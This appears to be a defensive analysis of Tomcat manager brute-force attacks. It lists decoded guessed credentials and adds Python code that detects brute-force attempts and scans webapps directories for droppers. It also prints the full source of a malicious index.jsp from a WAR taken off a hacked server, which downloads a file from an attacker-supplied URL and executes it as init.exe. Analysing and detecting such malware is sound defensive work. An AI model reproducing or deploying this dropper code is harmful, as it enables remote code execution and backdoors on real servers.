Base64 values seen in the Authorization header of Tomcat manager brute-force attempts, with their decoded values (HTTP Basic authentication sends user:password base64-encoded after the word "Basic"):

Authorization header value (Basic)   Decoded value (user:password)
bWFuYWdlcjpUZXN0                     manager:Test
bWFuYWdlcjphZG1pbnNlcnZlcg==         manager:adminserver
bWFuYWdlcjpzcWxzZXJ2ZXI=             manager:sqlserver
bWFuYWdlcjoyMDA5                     manager:2009
bWFuYWdlcjoxNTk3NTM=                 manager:159753
bWFuYWdlcjoxMjM0cXdlcmFzZGZ6eGN2     manager:1234qwerasdfzxcv
bWFuYWdlcjoxMjM0cXdlcmFzZGY=         manager:1234qwerasdf
bWFuYWdlcjoxMjM0cXdlcg==             manager:1234qwer
bWFuYWdlcjoxMjNxd2U=                 manager:123qwe
bWFuYWdlcjoxMjNxd2Vhc2Q=             manager:123qweasd
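The following Python is an added example, not code from the original page: it pulls Basic credentials out of captured requests to /manager/html, decodes them the way the table above was produced, and flags a source that cycles through many passwords for one user. The raw requests, the documentation-range source addresses and the threshold of five distinct passwords are assumptions made for the example; the base64 tokens are the ones in the table.

```python
import base64
import binascii
import re
from collections import defaultdict

# Constructed sample input: the Authorization values from the table above, as
# a reverse proxy log or packet capture would show them, all from one source.
# Source addresses are documentation-range IPs chosen for this example.
BRUTE_FORCE_TOKENS = [
    "bWFuYWdlcjpUZXN0", "bWFuYWdlcjphZG1pbnNlcnZlcg==", "bWFuYWdlcjpzcWxzZXJ2ZXI=",
    "bWFuYWdlcjoyMDA5", "bWFuYWdlcjoxNTk3NTM=", "bWFuYWdlcjoxMjM0cXdlcmFzZGZ6eGN2",
    "bWFuYWdlcjoxMjM0cXdlcmFzZGY=", "bWFuYWdlcjoxMjM0cXdlcg==", "bWFuYWdlcjoxMjNxd2U=",
    "bWFuYWdlcjoxMjNxd2Vhc2Q=",
]


def _request(auth_value):
    """Build one raw HTTP request to the manager app carrying the given Authorization value."""
    return ("GET /manager/html HTTP/1.1\r\nHost: tomcat.example\r\n"
            "Authorization: " + auth_value + "\r\n\r\n")


CAPTURED_REQUESTS = [("203.0.113.10", _request("Basic " + t)) for t in BRUTE_FORCE_TOKENS]
CAPTURED_REQUESTS += [
    # one legitimate operator login from a different address (constructed)
    ("198.51.100.5", _request("Basic " + base64.b64encode(b"deployer:c0rrect-h0rse").decode())),
    # a token-based request and a corrupted header, both of which must be ignored
    ("198.51.100.5", _request("Bearer not-basic-auth")),
    ("203.0.113.10", _request("Basic !!!not/base64")),
]

AUTH_RE = re.compile(r"^Authorization:\s*(.+?)\r?$", re.IGNORECASE | re.MULTILINE)


def parse_basic_auth(header_value):
    """Return (user, password) from a 'Basic <base64>' value, or None when the value
    is not well-formed Basic auth. Strict base64 validation stops garbage tokens
    from silently decoding to bytes."""
    parts = header_value.strip().split(None, 1)
    if len(parts) != 2 or parts[0].lower() != "basic":
        return None
    try:
        raw = base64.b64decode(parts[1], validate=True)
    except (binascii.Error, ValueError):
        return None
    # RFC 7617 does not fix the charset; try UTF-8 first, then fall back to Latin-1.
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        text = raw.decode("latin-1")
    if ":" not in text:
        return None
    user, password = text.split(":", 1)
    return user, password


def extract_attempts(captured):
    """Yield (src_ip, user, password) for every request carrying valid Basic credentials."""
    for src_ip, raw_request in captured:
        match = AUTH_RE.search(raw_request)
        if not match:
            continue
        creds = parse_basic_auth(match.group(1))
        if creds:
            yield src_ip, creds[0], creds[1]


def find_bruteforce(captured, threshold=5):
    """Return {(src_ip, user): sorted distinct passwords} for every source that tried
    at least `threshold` different passwords against the same user name."""
    tried = defaultdict(set)
    for src_ip, user, password in extract_attempts(captured):
        tried[(src_ip, user)].add(password)
    return {key: sorted(pws) for key, pws in tried.items() if len(pws) >= threshold}


if __name__ == "__main__":
    for (src_ip, user), passwords in find_bruteforce(CAPTURED_REQUESTS).items():
        print(src_ip, user, len(passwords), "passwords tried:", ", ".join(passwords))
```

Tomcat's default access log does not record the Authorization header, so input like this comes from a reverse proxy log or a capture in front of the server; server-side, the same pattern shows up as a burst of 401 responses to /manager/html from one address.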

The main reason attackers brute-force the Tomcat manager password is to deploy a WAR (web application archive) such as fexcep.war through the manager application.

We were able to download this WAR from a hacked server.

This WAR deploys two JSP files on the server: index.jsp and ok.jsp. The important parts of index.jsp are the file download routine (downFile) and the call to Runtime.getRuntime().exec() that runs whatever was downloaded.

The index.jsp has the following source code:

<%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*,java.security.*,javax.crypto.*"%>

<%!
// Declaration block: these become members of the generated servlet class,
// so 'sys' is one field shared by every request.
String sys = null;

public class AutoKill {
    // Fetches 'url' over HTTP and writes the response body to 'filesrc' on disk.
    // Returns true on success; any exception is only printed to the Tomcat log.
    private boolean downFile(String url, String filesrc) {
        try {
            URL urlc = new URL(url);
            HttpURLConnection con = (HttpURLConnection) urlc.openConnection();
            con.connect();
            byte[] b = new byte[1024];
            BufferedInputStream bis = new BufferedInputStream(con.getInputStream());
            FileOutputStream fos = new FileOutputStream(filesrc);
            int length = -1;
            while ((length = bis.read(b, 0, b.length)) != -1) {
                fos.write(b, 0, length);
            }
            fos.close();
            bis.close();
            return true;
        } catch (Exception e) {
            e.printStackTrace();
        }
        return false;
    }
}
%>

<%
    // Only Windows hosts are handled: the downloaded file is run as init.exe.
    sys = System.getProperty("os.name");
    int i = sys.indexOf("Windows");

    AutoKill ak = new AutoKill();

    if (i > -1) {
        String result;
        try {
            // The download location is fully attacker-controlled via ?userurl=...
            String url = request.getParameter("userurl");
            System.out.println(url);
            // Drop the payload as init.exe inside this web application's own directory.
            String filesrc = request.getSession().getServletContext().getRealPath("") + "/init.exe";
            if (ak.downFile(url, filesrc)) {
                // Execute the downloaded binary; the Process handle is never used.
                Process run_proc = Runtime.getRuntime().exec(filesrc);
                result = "Success! ";
            } else {
                result = "Failure! Down File Failure!";
            }
        } catch (Exception e) {
            result = "Failure!throws Exception - " + e.getMessage() + "! ";
        }
        request.setAttribute("result", result);
    } else {
        request.setAttribute("result", "Failure!Because Remote computer system is " + sys + "!");
    }

    // Hand the result string to ok.jsp, which shows it to the attacker.
    request.getRequestDispatcher("/ok.jsp").forward(request, response);
%>

Once the WAR is deployed, the attacker requests index.jsp from a browser with a userurl parameter pointing at a file they control. On a Windows host the JSP downloads that file into the web application's directory as init.exe and executes it, so a trojan or backdoor ends up running under the account of the Tomcat process; on any other operating system the os.name check fails and only the failure message is forwarded to ok.jsp.
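As an added example, not code from the page or from the malware, the following Python scanner walks a Tomcat webapps directory looking for the three behaviours index.jsp combines (fetch a URL, write under getRealPath(), run the result with Runtime.exec) and for the init.exe the dropper leaves behind. The sample directory tree, the "shop" and "hello.jsp" names, the benign JSP and the regular expressions are assumptions made for the example; index.jsp, init.exe and the indicator strings come from the code above.

```python
import os
import re
import tempfile

# Indicators taken from the index.jsp above. Each one alone is common in
# legitimate code, so a JSP is only flagged when it combines remote download,
# a write under the web root and process execution.
INDICATORS = {
    "remote_download": re.compile(r"HttpURLConnection|openConnection\s*\(|new\s+URL\s*\("),
    "writes_to_webroot": re.compile(r"getRealPath\s*\("),
    "process_exec": re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(|ProcessBuilder"),
    "os_fingerprint": re.compile(r"os\.name"),
    "param_controlled": re.compile(r"getParameter\s*\("),
}
REQUIRED = {"remote_download", "writes_to_webroot", "process_exec"}
# File name used by fexcep.war; extend with names from other samples.
DROPPED_BINARY_NAMES = {"init.exe"}


def scan_jsp_source(source):
    """Return the names of the indicators present in one JSP source string."""
    return {name for name, pattern in INDICATORS.items() if pattern.search(source)}


def scan_webapps(webapps_root):
    """Walk a Tomcat webapps directory; return sorted (path, reason) findings for
    JSPs that combine all REQUIRED indicators and for dropped binaries."""
    findings = []
    for dirpath, _dirs, files in os.walk(webapps_root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            if fname.lower() in DROPPED_BINARY_NAMES:
                findings.append((path, "dropped binary inside a web application"))
            elif fname.lower().endswith((".jsp", ".jspx")):
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = scan_jsp_source(fh.read())
                if REQUIRED <= hits:
                    findings.append((path, "download-and-execute dropper: " + ", ".join(sorted(hits))))
    return sorted(findings)


# Constructed sample tree (an assumption for the example): a benign JSP in one
# application, and a reduced copy of the dropper logic plus the init.exe it
# leaves behind in another.
BENIGN_JSP = ('<%@ page language="java" %>'
              '<% String name = request.getParameter("name"); out.println("Hello " + name); %>')
DROPPER_JSP = """<%@ page import="java.io.*,java.net.*"%>
<% String sys = System.getProperty("os.name");
   URL urlc = new URL(request.getParameter("userurl"));
   HttpURLConnection con = (HttpURLConnection) urlc.openConnection();
   String filesrc = request.getSession().getServletContext().getRealPath("") + "/init.exe";
   Process run_proc = Runtime.getRuntime().exec(filesrc); %>"""


def build_sample_webapps():
    """Create the sample tree in a temporary directory and return its root."""
    root = tempfile.mkdtemp(prefix="webapps_")
    os.makedirs(os.path.join(root, "shop"))
    os.makedirs(os.path.join(root, "fexcep"))
    with open(os.path.join(root, "shop", "hello.jsp"), "w", encoding="utf-8") as fh:
        fh.write(BENIGN_JSP)
    with open(os.path.join(root, "fexcep", "index.jsp"), "w", encoding="utf-8") as fh:
        fh.write(DROPPER_JSP)
    with open(os.path.join(root, "fexcep", "init.exe"), "wb") as fh:
        fh.write(b"MZ")  # stand-in for the downloaded executable
    return root


if __name__ == "__main__":
    for path, reason in scan_webapps(build_sample_webapps()):
        print(path, "->", reason)
```

Because the dropper writes init.exe next to its own JSPs, a plain inventory of unexpected executables under webapps catches this family even when the JSP source has been obfuscated beyond what the regexes recognise; run both checks.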